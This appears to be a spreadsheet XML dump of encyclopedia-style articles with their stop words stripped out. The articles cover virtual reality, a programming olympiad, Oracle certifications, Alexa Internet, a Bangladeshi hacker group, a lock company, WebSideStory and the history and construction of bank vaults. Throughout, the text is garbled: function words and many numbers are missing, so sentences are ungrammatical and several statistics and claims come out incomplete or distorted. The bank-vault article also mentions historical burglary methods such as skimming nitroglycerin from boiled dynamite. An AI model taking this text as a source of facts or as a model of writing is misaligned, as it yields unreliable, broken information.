components relative affordability independent developers, lead 2012 oculus rift kickstarter offering first independently developed headset.independent production images video increased alongside development affordable omnidirectional cameras, also known 360-degree cameras cameras, ability record interactive photography, although relatively resolutions highly compressed formats online streaming video. contrast, photogrammetry increasingly used combine several high-resolution photographs creation detailed objects environments applications.to create feeling immersion, special output devices needed display virtual worlds. well-known formats include head-mounted displays cave. order convey spatial impression, images generated displayed different perspectives (stereo projection). there different technologies available bring respective image right eye. distinction made active (e.g. shutter glasses) passive technologies (e.g. polarizing filters infitec).in order improve feeling immersion, wearable multi-string cables offer haptics complex geometries virtual reality. these strings offer fine control finger joint simulate haptics involved touching virtual geometries.special input devices required interaction virtual world. these include mouse, wired glove, motion controllers, optical tracking sensors. controllers typically optical tracking systems (primarily infrared cameras) location navigation, user move freely without wiring. some input devices provide user force feedback hands parts body, human orientate three-dimensional world haptics sensor technology sensory sensation carry realistic simulations. this allows viewer sense direction artificial landscape. additional haptic feedback obtained omnidirectional treadmills (with walking virtual space controlled real walking movements) vibration gloves suits. virtual reality cameras used create photography using 360-degree panorama videos. 360-degree camera shots mixed virtual elements merge reality fiction special effects. cameras available various formats, varying numbers lenses installed camera. visual immersion experience display resolution minimal angle resolution (mar) refers minimum distance display pixels. distance, viewer clearly distinguish independent pixels. often measured arc-seconds, pixels viewing distance. general public, resolution 30-65 arc-seconds, referred spatial resolution combined distance. given viewing distance respectively, regular viewers able perceive pixels separate less 0.29mm apart less 0.58mm apart image latency display refresh frequency most small-size displays refresh rate adds 15ms additional latency. number reduced less refresh rate increased even more. participants generally feel experience immersive higher refresh rates result. however, higher refresh rates require powerful graphics processing unit. relationship display field view need consider field view (fov) addition quality image. eyes horizontal degrees side vertical degrees. stereopsis vision limited degrees right left visions overlap. generally speaking, degrees degrees eyes. however, peripheral vision, varies person another. conservatively take average, i.e. degrees. therefore, keep eyes stationary, regular participant least stereopsis degrees degrees 360-degree fov. quantify abstract concept immersion immersive index getting ratio display viewing area 360-degree fov. theory, display area immersive index {\displaystyle {\frac {\mbox{display area}}{{\frac {1}{6}}\times 4\pi {\mathsf {r}}^{2}}}={\mbox{immersive index practice, considering curved display cannot made spherical shape, approximated cylinder instead. display area immersive index {\displaystyle {\frac {\mbox{display area}}{{\frac {1}{6}}\times {\bigl (}2\pi {\mathsf {r}}{\bigr )}^{2}}}={\mbox{immersive index applications virtual reality commonly used entertainment applications video games, cinema, dark rides social virtual worlds. consumer virtual reality headsets first released video game companies early-mid 1990s. beginning 2010s, next-generation commercial tethered headsets released oculus (rift), (vive) sony (playstation vr), setting wave application development. cinema used sporting events, pornography, fine art, music videos short films. since 2015, roller coasters theme parks incorporated virtual reality match visual effects haptic feedback.in social sciences psychology, virtual reality offers cost-effective tool study replicate interactions controlled environment. used form therapeutic intervention. instance, case virtual reality exposure therapy (vret), form exposure therapy treating anxiety disorders post traumatic stress disorder (ptsd) phobias.virtual reality programs used rehabilitation processes elderly individuals diagnosed alzheimer's disease. this gives elderly patients opportunity simulate real experiences would otherwise able experience current state. recent studies randomized controlled trials shown virtual reality applications effective treating cognitive deficits neurological diagnoses. loss mobility elderly patients lead sense loneliness depression. virtual reality able assist making aging place lifeline outside world cannot easily navigate. virtual reality allows exposure therapy take place safe environment.in medicine, simulated surgical environments first developed 1990s. under supervision experts, provide effective repeatable training cost, allowing trainees recognize amend errors occur.virtual reality used physical rehabilitation since 2000s. despite numerous studies conducted, good quality evidence efficacy compared rehabilitation methods without sophisticated expensive equipment lacking treatment parkinson's disease. 2018 review effectiveness mirror therapy virtual reality robotics type pathology concluded similar way. another study conducted showed potential promote mimicry revealed difference neurotypical autism spectrum disorder individuals response two-dimensional avatar.immersive virtual reality technology myoelectric motion tracking control represent possible therapy option treatment-resistant phantom limb pain. pain scale measurements taken account interactive kitchen environment developed bases principles mirror therapy allow control virtual hands wearing motion-tracked headset. systematic search pubmed embase performed determine results pooled meta-analysis. meta-analysis showed significant result favor balance. fast-paced globalised business world meetings used create environment interactions people (e.g. colleagues, customers, partners) feel natural phone call video chat. customisable meeting rooms parties join using headset interact physical room. presentations, videos models e.g. products prototypes) uploaded interacted with. compared traditional text-based cmc, avatar-based interactions virtual environment lead higher levels consensus, satisfaction, cohesion among group members. simulate real workspaces workplace occupational safety health purposes, educational purposes, training purposes. used provide learners virtual environment develop skills without real-world consequences failing. used studied primary education, anatomy teaching, military, astronaut training, flight simulators, miner training, medical education, architectural design, driver training bridge inspection. immersive engineering systems enable engineers virtual prototypes prior availability physical prototypes. supplementing training virtual training environments claimed offer avenues realism military healthcare training minimizing cost. also claimed reduce military training costs minimizing amounts ammunition expended training periods. also used healthcare training education medical practitioners.in engineering field, proved useful engineering educators students. previously expensive cost educational department much accessible lowered overall costs, proven useful tool educating future engineers. significant element lies ability students able interact models accurately respond based real world possibilities. this added tool education provides many immersion needed grasp complex topics able apply them. noted, future architects engineers benefit greatly able form understandings spatial relationships providing solutions based real-world future applications.the first fine virtual world created 1970s. technology developed, artistic programs produced throughout 1990s, including feature films. when commercially available technology became widespread, festivals began emerge mid-2010s. first uses museum settings began 1990s, seeing significant increase mid-2010s. additionally, museums begun making content virtual reality accessible.virtual reality's growing market presents opportunity alternative channel digital marketing. also seen platform e-commerce, particularly challenge traditional "brick mortar" retailers. however, 2018 study revealed majority goods still purchased physical stores.in case education, uses virtual reality demonstrated capable promoting higher order thinking, promoting interest commitment students, acquisition knowledge, promoting mental habits understanding generally useful within academic context.a case also made including virtual reality technology context public libraries. this would give library users access cutting-edge technology unique educational experiences. this could include giving users access virtual, interactive copies rare texts artifacts tours famous landmarks archeological digs case virtual ganjali khan project).starting early 2020s, virtual reality also discussed technological setting support people's griefing process, based digital recreations deceased individuals. 2021, practice received substantial media attention following south korean documentary, invited griefing mother interact virtual replica deceased daughter. subsequently, scientists summarized several potential implications endeavours, including potential facilitate adaptive mourning, also many ethical challenges.growing interest metaverse resulted organizational efforts incorporate many diverse applications virtual reality ecosystems like viverse, reportedly offering connectivity platforms wide range uses. concerts october 2021, billie eilish performed oculus venues. group imagine dragons performed june 2022. concerns challenges health safety there many health safety considerations virtual reality. number unwanted symptoms caused prolonged virtual reality, slowed proliferation technology. most virtual reality systems come consumer warnings, including: seizures; developmental issues children; trip-and-fall collision warnings; discomfort; repetitive stress injury; interference medical devices. some users experience twitches, seizures blackouts using headsets, even history epilepsy never blackouts seizures before. 4,000 people, .025%, experience symptoms. motion sickness, eyestrain, headaches, discomfort prevalent short-term adverse effects. addition, virtual reality headsets' heavy weight, discomfort likely among children. therefore, children advised using headsets. other problems occur physical interactions one's environment. while wearing headsets, people quickly lose awareness real-world surroundings injure tripping over, colliding real-world objects.vr headsets regularly cause fatigue, screened technology, people tend blink less watching screens, causing eyes become dried out. there concerns headsets contributing myopia, although headsets close eyes, necessarily contribute nearsightedness focal length image displayed sufficiently away.virtual reality sickness (also known cybersickness) occurs person's exposure virtual environment causes symptoms similar motion sickness symptoms. women significantly affected headset-induced symptoms, rates around respectively. common symptoms general discomfort, headache, stomach awareness, nausea, vomiting, pallor, sweating, fatigue, drowsiness, disorientation, apathy. example, nintendo's virtual received much criticism negative physical effects, including "dizziness, nausea, headaches". these motion sickness symptoms caused disconnect seen rest body perceives. when vestibular system, body's internal balancing system, experience motion expects visual input eyes, user experience sickness. this also happen system high enough frame rate, body's movement onscreen visual reaction because approximately 25–40% people experience kind sickness using machines, companies actively looking ways reduce sickness.in january 2022 wall street journal found usage could lead physical injuries including leg, hand, shoulder injuries. usage also tied incidents resulted neck injuries, death. children virtual reality relationship virtual reality underage users controversial unexplored. meantime, children becoming increasingly aware number never heard dropping half autumn 2016 (40%) spring 2017 (19%).valeriy kondruk, travel platform ascape, says downloads march 2020 increased compared december 2019 doubled comparison january 2020. according kondruk, normally, busiest month companies december, associated winter holidays people spending time home.in early 2016, virtual reality headsets became commercially available offers from, example, facebook (oculus), valve (vive) microsoft (hololens), sony (morpheus). time day, brands different instructions users, e.g. 14+, indicates completely self-regulatory policy.studies show young children, compared adults, respond cognitively behaviorally immersive ways differ adults. places users directly media content, potentially making experience vivid real children. example, children 6–18 years reported higher levels presence "realness" virtual environment compared adults 19–65 years age.studies consumer behavior effect children code ethical conduct involving underage users especially needed, given availability porn violent content. related research violence video games suggests exposure media violence affect attitudes, behavior, even self-concept. self-concept indicator core attitudes coping abilities, particularly adolescents. early studies conducted observing versus participating violent games suggest physiological arousal aggressive thoughts, hostile feelings, higher participants observers virtual reality game.experiencing children involve simultaneously holding idea virtual world mind experiencing physical world. excessive usage immersive technology salient sensory features compromise children's ability maintain rules physical world, particularly wearing headset blocks location objects physical world. immersive provide users multisensory experiences replicate reality create scenarios impossible dangerous physical world. observations children experiencing first time suggested 8-12-years-old kids confident explore content familiar situation, e.g. children enjoyed playing kitchen context simulator, enjoyed breaking rules engaging activities allowed reality, setting things fire. privacy persistent tracking required systems makes technology particularly useful for, vulnerable mass surveillance. expansion increase potential reduce costs information gathering personal actions, movements responses. data tracking sensors, projected become standard feature virtual reality headsets, indirectly reveal information user's ethnicity, personality traits, fears, emotions, interests, skills, physical mental health condition. conceptual philosophical concerns addition, conceptual philosophical considerations implications associated virtual reality. what phrase "virtual reality" means refers ambiguous. mychilo cline argued 2005 virtual reality, techniques developed influence human behavior, interpersonal communication, cognition. virtual reality fiction also comparison virtual reality headsets references further reading choi, sangsu, kiwook jung, sang (2015). "virtual reality applications manufacturing industries: past research, present findings, future directions". concurrent engineering. 1063293x14568814.{{cite web}}: maint: multiple names: authors list (link) external links isaac, joseph (2016). "step world virtual reality (vr)". retrieved july 2016. basic concepts virtual reality along research challenges explained simple words. mixed reality scale milgram kishino's (1994) virtuality continuum paraphrase examples. drummond, katie (2014). "the rise fall rise virtual reality". verge. retrieved november 2014. interviews history future virtual reality leaders field. "virtual reality human-system interaction".</t>
  </si>
  <si>
    <t>British Informatics Olympiad</t>
  </si>
  <si>
    <t>british informatics olympiad (bio) annual computer-programming competition secondary sixth-form students. student full-time pre-university education resident mainland britain eligible compete. competition composed rounds preliminary 3-question, 3-hour exam paper participant's school final round. top-15 performing students year invited finals (currently hosted trinity college, cambridge) attempt solve several difficult problems, written, involving programming. typically score required first round competition reach final. fifteen, four chosen british team, chosen reserves. this team goes represent britain international olympiad informatics summer year. mark schemes available past papers competition's official site. official worked solutions available papers 1995-1999 2004, whilst unofficial solutions available papers 2009-2014. sponsors sponsored video-games developer lionhead studios since 2002. past, also sponsored data connection. also young scientists year references external links official website</t>
  </si>
  <si>
    <t>Oracle Certification Program</t>
  </si>
  <si>
    <t>oracle certification program certifies candidates skills knowledge related oracle products technologies. credentials granted based combination passing exams, training performance-based assignments, depending level certification. oracle certifications tangible benchmarks experience expertise oracle claims help participant stand crowd among employers. there levels oracle certification credentials: oracle certified junior associate (ocja), oracle certified associate (oca), oracle certified professional (ocp), oracle certified master (ocm), oracle certified expert (oce) oracle certified specialist (ocs). these credentials spread across technology pillars broken product family product groupings. certifications also defined role oracle certification website. oracle certified junior associate (oja) credential novice-level certification focused students secondary schools, two-year colleges four year colleges universities faculty members teach foundational java computer science classes. oracle certified associate (oca) credential first step toward achieving oracle certified professional certification. credential ensures candidate equipped fundamental skills, providing strong foundation supporting oracle products. oracle certified professional (ocp) credential builds upon fundamental skills demonstrated oca. oracle certified professional command specific area oracle technology demonstrates high level knowledge skills. managers often credential evaluate qualifications employees candidates. oracle certified master (ocm) credential recognizes highest level demonstrated skills, knowledge proven abilities. ocms equipped answer difficult questions solve complex problems. oracle certified master certification validates candidate's abilities passing rigorous performance-based exams. certification typically builds upon fundamental skills advanced skills ocp. oracle certified expert (oce) credentials recognize competency specific, niche oriented technologies, architectures domains. credentials independent traditional oca, ocp, hierarchy, often build upon skills proven ocp. competencies falling umbrella expert program range foundational skills mastery advanced technologies. oracle certified specialist (ocs) credentials typically implementation-oriented certifications targeting employees current oracle partners, though certifications available candidates, partner not. these certifications built focused products skillsets provide solid measure candidate's level expertise particular area. java certification list following list java exams currently available oracle certification path. requirements oracle university offers different certifications different oracle products services. candidate chooses certain certification he/she wishes earn follow requirements particular certification. requirements include passing exam offered pearson vue, earning prerequisite certification, completing training, submitting course verification form. prior taking oracle certification exam, candidate must register account authenticate certview account well. exam voucher purchased oracle university candidate register exam directly pearson website without voucher. vouchers also purchase authorized oracle partner. candidate bring valid forms identification; must contain signature, contain photo, government-issued. purchased exam voucher used within months forfeited without refund. candidate prepare exam attending training prep seminars, offered oracle university practice tests kaplan transcender. these optional required certification. candidate failed exam, 5-day waiting period pass retaking exam. exam attempt must paid full. candidate fails show scheduled testing time date, exam voided refund shall given. there restrictions candidates coming cuba, iran, north korea, sudan, syria. candidate minor consent his/her parent guardian.typically, exam associated certification. however, certifications require two. aside passed exam, certifications requires candidate attend training oracle university. java master certification, exams multiple choice, instead assignment finished essay exam well. both assignment essay must completed within months purchasing assignment. failed assignments must resubmitted within days. some certification levels build other; example, associate certification required professional, professional certification required master. expert specialist certification prerequisite certification like associate. oracle recently introduced junior associate certifications (e.g., "java foundations junior associate 1z0-811" exam) targets school college students. oracle certified associate java programmer (formerly certified java programmer) oracle certified associate java programmer tests candidate's knowledge java programming language prerequisite oracle certified programmer.while advanced certifications focus candidate's knowledge api, entry-level exam focuses variables, class interface definitions, arrays, exception handling, encapsulation, polymorphism, flow control. candidate must also demonstrate strings array lists. version test made available final release since december 2014. tested candidate's knowledge lambdas, boxing (auto-wrapping), date time api.there longer credential awarded java oracle certified professional java programmer (also formerly certified java programmer) oracle's certified professional java programmer (ocpjp) exam fundamental exam required demonstrate solid understanding java apis prerequisite number java certificates. designed fairly detailed test knowledge core features constructs java programming language. tests wide range java's apis core features, starting basics looping constructs variables, complex topics threads, collections generics. cover specific technology domains creation, network programming, though cover part apis included standard library. exam tests well programmer understood language constructs mechanisms. however goal exam test programmer's ability produce purposeful efficient programs. test programmer's ability write efficient algorithms, example, though test knowledge collections selected order implement efficient algorithms without re-inventing wheel. assessed automatically administered multiple-choice test system consists questions candidate minutes answer. least questions needed correct pass (around 61%). take test candidate must voucher oracle (approximately us$300 £150 (excluding vat) plus australia, 8000 plus taxes india) book test least week advance. test consists multiple choice questions. june 2011, oracle moved prometric pearson test provider. references external links training certification oracle technology oracle university oracle testing pearson certview login oracle certification program: steps oracle certification program: overview oracle certification program: exam listing</t>
  </si>
  <si>
    <t>Alexa Internet</t>
  </si>
  <si>
    <t>alexa internet, inc. american traffic analysis company based francisco. wholly-owned subsidiary amazon. alexa founded independent company 1996 acquired amazon 1999 $250 million stock. alexa provided traffic data, global rankings, information million websites. alexa estimated website traffic based sample millions internet users using browser extensions, well sites chosen install alexa script. 2020, website visited million people every month. december 2021, amazon announced would shutting alexa internet subsidiary. service discontinued 2022. operations history 1996–1999 alexa internet founded april 1996 brewster kahle bruce gilliat. company's name chosen homage library alexandria ptolemaic egypt, drawing parallel largest repository knowledge ancient world potential internet become similar store knowledge. alexa initially offered toolbar gave internet users suggestions next, based traffic patterns user community. company also offered context site visited: registered, many pages had, many sites pointed frequently updated.alexa's operations grew include archiving pages "crawled" examined automated computer program (nicknamed "bot" "web crawler"). this database served basis creation internet archive accessible wayback machine. 1998, company donated copy archive, terabytes size, library congress. alexa continued supply internet archive crawls. 1999, company moved away original vision providing "intelligent" search engine, alexa acquired amazon.com approximately us$250 million amazon stock. 2000–2009 alexa began partnership google early 2002, directory dmoz january 2003. december 2005, alexa opened extensive search index web-crawling facilities third-party programs comprehensive services apis. these could used, instance, construct vertical search engines could alexa's servers elsewhere. 2006, google replaced windows live search provider search results. december 2006, amazon released alexa image search. built in-house, first major application built company's platform. 2007, alexa changed limit comparisons three websites, reduce size embedded graphs flash, mandatory embedded britepic advertisements. april 2007, company filed lawsuit, alexa hornbaker, stop trademark infringement statsaholic service. lawsuit, alexa alleged hornbaker stealing traffic graphs profit, primary purpose site display graphs generated alexa's servers. hornbaker removed term alexa service name march 2007. november 2008, amazon announced alexa search longer accepting customers, service would deprecated discontinued existing customers january 2009. thereafter, alexa became purely analytics-focused company. march 2009, alexa revealed major website redesign. redesigned site provided traffic metrics—including average page views individual user, bounce rate (the rate users come leave webpage), user time website. following weeks, alexa added features, including visitor demographics, clickstream search traffic statistics. 2010–2020 during period, alexa evolving along algorithm. statistics projection technology associated large network certificated websites allowed keep ahead website traffic metrics around world. because this, many large sites using main reference popularity internet. service wednesday, december 2021, amazon announced cessation website ranking competitive analysis service, available public years. statement first published website specifies total cessation service 2022. december became longer possible create accounts subscriptions service. existing subscriptions would available 2022, utc, 2022 everything site removed replaced "end service notice". alexa traffic rank metric published alexa internet analytics alexa traffic rank, also simply known alexa rank. also referred global rank alexa internet designed estimate website's popularity. 2018, alexa internet's tooltip global rank said rank calculated combination daily visitors page views website three-month period.the alexa traffic rank could used monitor popularity trend website compare popularity different websites.the traffic rank used determined data recollected users alexa toolbar installed browser. 2020, alexa toolbar; instead, used data users installed number browser extensions websites alexa script installed webpages. tracking browser extensions alexa replaced toolbar browser extensions. these extensions made available google chrome firefox browsers. alexa browser extension displayed alexa traffic rank websites, showed related websites, provided search analytics, quickly allowed users view internet archive wayback machine. they last updated 2020 time service's closure. toolbar alexa used rank sites based primarily tracking sample internet traffic—users browser toolbar internet explorer, firefox google chrome browsers. alexa toolbar included popup blocker (which stops unwanted ads), search box, links amazon.com alexa homepage, alexa ranking website user visiting. also allowed user rate website view links external, relevant websites. early 2005, alexa stated million downloads toolbar, though company provide statistics active usage. originally, pages ranked amongst users alexa toolbar installed, could biased specific audience subgroup reluctant take part rankings. this caused controversies representative alexa's user base typical internet behavior, especially less-visited sites. 2007, michael arrington provided examples alexa rankings known contradict data comscore analytics service, including ranking youtube ahead google. 2021 john mueller google confirm google amazon alexa rank. search status until 2007, third-party-supplied mozilla plug-in called search status firefox browser served option firefox users amazon abandoned toolbar. july 2007, alexa released official toolbar firefox called sparky. april 2008, many users reported drastic shifts alexa rankings. alexa confirmed later announcement released updated ranking system, claiming would take account sources data "beyond alexa toolbar users". certified statistics using alexa service, website owners could sign "certified statistics", allowed alexa access website's traffic data. site owners input javascript code page website that, permitted user's security privacy settings, sent traffic data alexa, allowing alexa display—or display, depending owner's preference—more accurate statistics total page views unique page views. privacy assessments alexa last detailed privacy notice july 2020 part website terms user license agreement. also google analytics analytics service google list visited websites list search engines list directories similarweb references external links official website</t>
  </si>
  <si>
    <t>Bangladesh Black Hat Hackers</t>
  </si>
  <si>
    <t>bangladesh black hackers black hats (bengali: বাংলাদেশ ব্ল্যাক হ্যাট হ্যাকার্স) hacker group based bangladesh. claimed 2012 hacked indian websites retaliation border killings indian border security force construction tipaimukh dam. although bangladesh black hackers declared cyber war, later bangladesh-based hacker groups bangladesh cyber army 3xp1r3 cyber army also joined them.the incident described cyber without presence governmental personnel threat attack given february 2012 till february 10,000 websites claimed hacked. number rose 20,000 later.around march 2015, group also took responsibility hacking shashi tharoor's website, owing negative comments bangladesh's cricket england. also anonymous (hacker group) lulzsec references external links "nearly 20,000 indian sites hacked bangladesh groups protesting border killings". xinhua news agency. february 2012. archived original february 2012.</t>
  </si>
  <si>
    <t>Banham Group</t>
  </si>
  <si>
    <t>banham group (formerly known banham patent locks) family owned security company. established 1926, banham group largest supplier burglary fire prevention systems london.the company's history dates back 1926, william banham invented first automatic latch bolt lock series burglaries wife's dress shop. opened locksmith shop oxford street, london, offered anyone could pick break patented locks.banham group still offer patented locks security registration system well security products services. between years 1968 1981, company created alarms division, access control division opened alarm receiving centre. since then, received awards metropolitan police alarm systems, certificates secured design, official police flagship initiative, locks, shutters, grilles safes. company also provides security celebrities politicians.the company head office based earlsfield, showrooms kensington, golders green, thames valley maidenhead, guildford south coast showroom worthing.banham group moved purpose-built headquarters earlsfield offices vauxhall 2015. companies banham group aegis alarm systems banham patent locks banham close protection bridger alarms capstan security close link security keyholding security security tara burglar alarms references sources glasgow herald january 1931) external links official website</t>
  </si>
  <si>
    <t>WebSideStory</t>
  </si>
  <si>
    <t>websidestory, inc. (later visual sciences), founded blaise barrelet 1996 analytics tool link directory; products hitbox hbx. company went public september 2004 (nasdaq: wssi). 2006, websidestory acquired high-end private data analysis visualization software company visual sciences million. year acquisition, websidestory rebranded visual sciences, inc. january 2008 visual sciences, inc. acquired omniture (nasdaq: omtr) $394 million.websidestory founded headquartered diego, california business model evolution websidestory originally launched saas business model, charging customers monthly analytics, finding customers willing analytics proved difficult. websidestory pivoted offer limited version analytics product free exchange small advertising banner website. users clicked banners directed list sites owned websidestory, creating advertising revenue opportunity. unlike many late '90s internet startups, websidestory raise angel funding venture capital, became profitable customers displaying banners site list. late 1999, websidestory opted target larger brick-and-mortar businesses customers hitbox product. customers opted in-depth statistics exchange removing traditional hitbox banner websites, giving birth "hbx" product line. once websidestory financially sound, shuttered free version hitbox associated advertising revenues. company went public 2004 eventually purchased visual sciences, adopting name. visual sciences turn acquired omniture 2008, october 2009 omniture acquired adobe systems, integrated adobe marketing cloud. references</t>
  </si>
  <si>
    <t>Bank vault</t>
  </si>
  <si>
    <t>bank vault secure space money, valuables, records, documents stored. intended protect contents theft, unauthorized use, fire, natural disasters, threats, much like safe. unlike safes, vaults integral part building within built, using armored walls tightly fashioned door closed complex lock. historically, strongrooms built basements banks ceilings vaulted, hence name. modern bank vaults typically contain many safe deposit boxes, well places teller cash drawers valuable assets bank customers. they also common buildings valuables kept post offices, grand hotels, rare book libraries certain government ministries. vault technology developed type arms race bank robbers. burglars came ways break vaults, vault makers found ways foil them. modern vaults armed wide array alarms anti-theft devices. some 19th early 20th century vaults built well today difficult destroy, even specialized demolition equipment. these older vaults typically made steel-reinforced concrete. walls usually least (0.3 thick, door typically (1.1 thick. total weight hundreds tons (see federal reserve bank cleveland). today vaults made thinner, lighter materials that, still secure, easier dismantle earlier counterparts. history need secure storage stretches back time. earliest known locks made egyptians. ancient romans used sophisticated locking system, called warded locks. warded locks special notches grooves made picking difficult. lock technology advanced independently ancient india, russia, china, combination lock thought originated. united states, banks relied small iron safes fitted lock middle nineteenth century. after gold rush 1849, unsuccessful prospectors turned robbing banks. prospectors would often break bank using pickaxe hammer. safe usually small enough thief could window, take secluded spot break open. banks demanded protection safe makers responded designing larger, heavier safes. safes lock still vulnerable hole, bank robbers soon learned blast door pouring explosives opening. 1861, inventor linus yale introduced modern combination lock. bankers quickly adopted yale's lock safes, bank robbers came several ways past invention. possible force punch combination lock door. other experienced burglars learned drill holes lock case mirrors view slots combination wheels inside mechanism. direct approach simply kidnap bank manager force reveal combination. after inventions combination lock, james sargent—an employee yale—developed "theft-proof lock". this combination lock worked timer. vault safe door could opened number hours passed, thus kidnapped bank employee could open lock middle night even force. time locks became widespread banks 1870s. this reduced kidnappings, bank robbers work prying blasting open vaults. thieves developed tools forcing open tiny crack vault door frame. crack widened, thieves levered door open poured gunpowder blasted off. vault makers responded series stair-stepped grooves door frame door could levered open. grooves proved ideal weapon: liquid nitroglycerin. professional bank robbers learned boil dynamite kettle water skim nitroglycerin top. they could drip volatile liquid door grooves destroy door. vault makers subsequently redesigned doors closed thick, smooth, tapered plug. plug tightly room nitroglycerin. another attempt deter robberies advent combination viewer, designed frederick holmes. vault door combination viewers steel boxes mounted door jambs operate combination locks, locking bolts, pressure systems, door rotation remotely. early 1900s trade publications patents refer complex devices ‘illuminated dial cases’, ‘periscope attachments’, ‘periscopic sights’, ‘telescopic boxes’, ‘time lock adjusters’ found vault door types circular, rectangular cylindrical. combination locks bolt-throwing mechanism located inside vault creating solid vault door spindle holes. entry requires points attack (door jamb) doubles time required burglars breach vault. frederick holmes prominent bank vault engineer designed bank vaults throughout world early 1900s. specialized jamb-controlled vaults, many combination viewers. largest circular, hinged vault door world federal reserve bank cleveland combination viewers main emergency vault doors. largest cylindrical vault doors world pennsylvania treasury dual combination viewers. 1920s, banks avoided using safes instead turned gigantic, heavy vaults walls doors several feet thick. these meant withstand robbers also angry mobs natural disasters. despite security measures, vaults still vulnerable another invention, cutting torch. burning oxygen acetylene 6,000 (3,300 °c), torch could easily steel. early 1907, became widespread world robbers used cutting torches bank robberies 1924 alone. manufacturers learned sandwich copper alloy vault doors. heated, high thermal conductivity copper dissipates heat prevent melting burning. after design improvement, bank burglaries fell less common 1920s beginning decade. technology continues race bank robbers, coming devices heat sensors, motion detectors, alarms. bank robbers turn developed even technological tools find ways around systems. although number bank robberies dramatically, still attempted. materials used vaults vault doors changed well. earlier vaults steel doors, could easily torches, different materials tried. massive cast iron doors resistance acetylene torches steel. modern preferred vault door material concrete used vault wall panels. usually clad steel cosmetic reasons. design bank vaults built custom orders. vault usually first aspect bank building designed built. manufacturing process begins design vault, rest bank built around vault manufacturer consults customer determine factors total vault size, desired shape, location door. after customer signs design, manufacturer configures equipment make vault panels door. customer usually orders vault delivered installed. that vault manufacturer makes vault parts, brings parts construction site puts together. bank vaults typically made steel-reinforced concrete. this material substantially different used construction work. relied immense thickness strength. ordinary vault middle 20th century might (45.72 thick quite heavy difficult remove remodel around. modern bank vaults typically made modular concrete panels using special proprietary blend concrete additives extreme strength. concrete engineered maximum crush resistance. panel material, though (7.62 thick, times strong in-thick (45.72-cm) panel regular formula concreted. there least public examples vaults withstanding nuclear blast. famous teikoku bank hiroshima whose mosler safe company vaults survived atomic blast contents intact. bank manager wrote congratulatory note mosler. second vault nevada national security site (formerly nevada test site) ground mosler vault many structures specifically constructed exposed atomic blast operation plumb project 30.4:response protective vaults blast loading. manufacturing process panels wall panels molded first using special reinforced concrete mix. addition usual cement powder, stone, etc., additional materials metal shavings abrasive materials added resist drilling penetration slab. unlike regular concrete used construction, concrete bank vaults thick cannot poured. consistency concrete measured "slump". vault concrete zero slump. also sets quickly, curing hours, instead three four days needed concrete. network reinforcing steel rods manually placed damp mix. molds vibrated several hours. vibration settles material eliminates pockets. edges smoothed trowel, concrete allowed harden. panels removed mold placed truck transport customer's construction site. door vault door also molded special concrete used make panels, made several ways. door mold differs panel molds hole lock door clad stainless steel. some manufacturers steel cladding mold pour concrete directly other manufacturers regular mold screw steel panel dry. round vault doors popular early 20th century iconic images bank's high security. they fell favor manufacturing complexities, maintenance issues (door weight) cost, examples still available.a gate second door inside main vault door frame used limited vault protection main door open. often made open metal mesh glass intended keep casual visitor rather provide true security. lock vault door, much like smaller burglary safe door, secured numerous massive metal bolts (cylinders) extending door surrounding frame. holding bolts place sort lock. lock invariably mounted inside (behind) difficult-to-penetrate door usually modest size strength, difficult gain access outside. there many types lock mechanisms use: combination lock similar principle padlock safe door common. this usually mechanical device products incorporating mechanical electronic mechanisms available, making certain safe cracking techniques difficult. some high-end vaults employ piece used conjunction combination lock. this consists long stem well short stamp safe guarded separately joined together open vault door. dual control (dual custody) combination lock dials controlling locking mechanisms door. they usually configured locks must dialed open time door unlocked. single person given combinations, requiring people cooperate open door. some doors configured either dial unlock door, trading increased convenience lessened security. time lock clock prevents vault's door opening specified number hours passed. this still "theft proof" lock system sargent invented late nineteenth century. such locks manufactured companies worldwide. locking system supplied vault manufacturer preassembled. many safe-cracking techniques also apply locking mechanism vault door. they complicated sheer thickness strength door panel. installation finished vault panels, door, lock assembly transported bank construction site. vault manufacturer's workers place panels enclosed steel designated spots weld together. vault manufacturer also supply alarm system, installed time. while older vaults employed various weapons burglars, blasts steam tear gas, modern vaults instead technological countermeasures. they wired listening device picks unusual sounds, observed camera. alarm often present alert local police door lock tampered with. resistance standards quality control much world's vault industry overseen underwriters laboratories, inc. (ul), northbrook, illinois. until 1991, united states government also regulated vault industry. government minimum standards thickness vault walls, advances concrete technology made thickness arbitrary measure strength. thin panels materials stronger thicker, poured concrete walls. effectiveness vault measured well performs mock break-in. manufacturers also testing designing product make sure likely succeed trials. points include: based using "common hand tools, picking tools, mechanical portable electric tools, grinding points carbide drills, pressure applying devices mechanisms, abrasive cutting wheels, power saws, coring tools, impact tools, fluxing rods, oxy-fuel cutting torches". breach hole door wall least square inches (15.24 40.64 cm)) breaking locking bolts allow door open. considers time actually spent working (excludes setup, rests, etc.) does cover attacks thermal lance explosives. ul-608 makes claims fire resistance vault. applies door sides. lock, ventilation, alarms, etc. covered standards. european resistance standards europe agreed series test standards assure common view penetrative resistance forcible attack. testing regime covered auspices euronorm 1143-1:2012 (also known 1143-1: 2012), purchased approved european standards agencies.key points include: standard covers burglary resistance tests free-standing safes atms, well strongrooms doors tests undertaken arrive grade xiii) extra resistance qualifiers (one explosives core drills) test attack tools fall five categories increasing penetrative capability, i.e. categories penetration success measured partial (125mm diameter hole) full (350mm diameter hole) considers time actually spent working (excludes setup, rests, etc.) 1143-1 makes claims fire resistance vault 1300 covers high security locks, i.e. four lock classes applies door vault sides. repurposing manufacturing process unusual waste byproducts, getting bank vaults problem. newer, modular bank vaults moved bank closes relocates. they also enlarged bank needs change. older bank vaults quite difficult demolish. bank building renovated another use, cases specialty contractor called demolish vault. vault's demolition requires massive wrecking equipment take months work large expense. least company united states refurbishes vault doors resold. cases, owner former bank building vault alternative purpose. there restaurants bars york city, cambridge, massachusetts, cleveland, ohio, laurel, mississippi, houston, texas, cape charles, virginia, london, england, former bank vault either seating area storage room wine liquor. herrell's cream shop harvard square, cambridge, massachusetts, used former bank vault seating area customers years closing 2009 reopening restaurant pub. baltimore marriott hotel baltimore, maryland, king west hotel residence toronto, canada, board room meetings former bank vault. community center crown point, indiana, uses former bank vault gift shop gallery. gallery coffee shop quincy, illinois, uses bank vault storage room. starbucks coffee shop bridgehampton, york, former bank vault featured decor. clothing shop ventura, california, uses bank vault dressing room. former bank building fort greene, brooklyn, former bank vault used parties flea market. future bank vault technology changed rapidly 1980s 1990s development improved concrete material. bank burglaries also longer substantial problem late 19th century 1930s, vault makers continue alter products counter break-in methods. issue 21st century thermal lance. burning iron rods pure oxygen ignited oxyacetylene torch, produce temperatures 6,600–8,000 (3,650–4,430 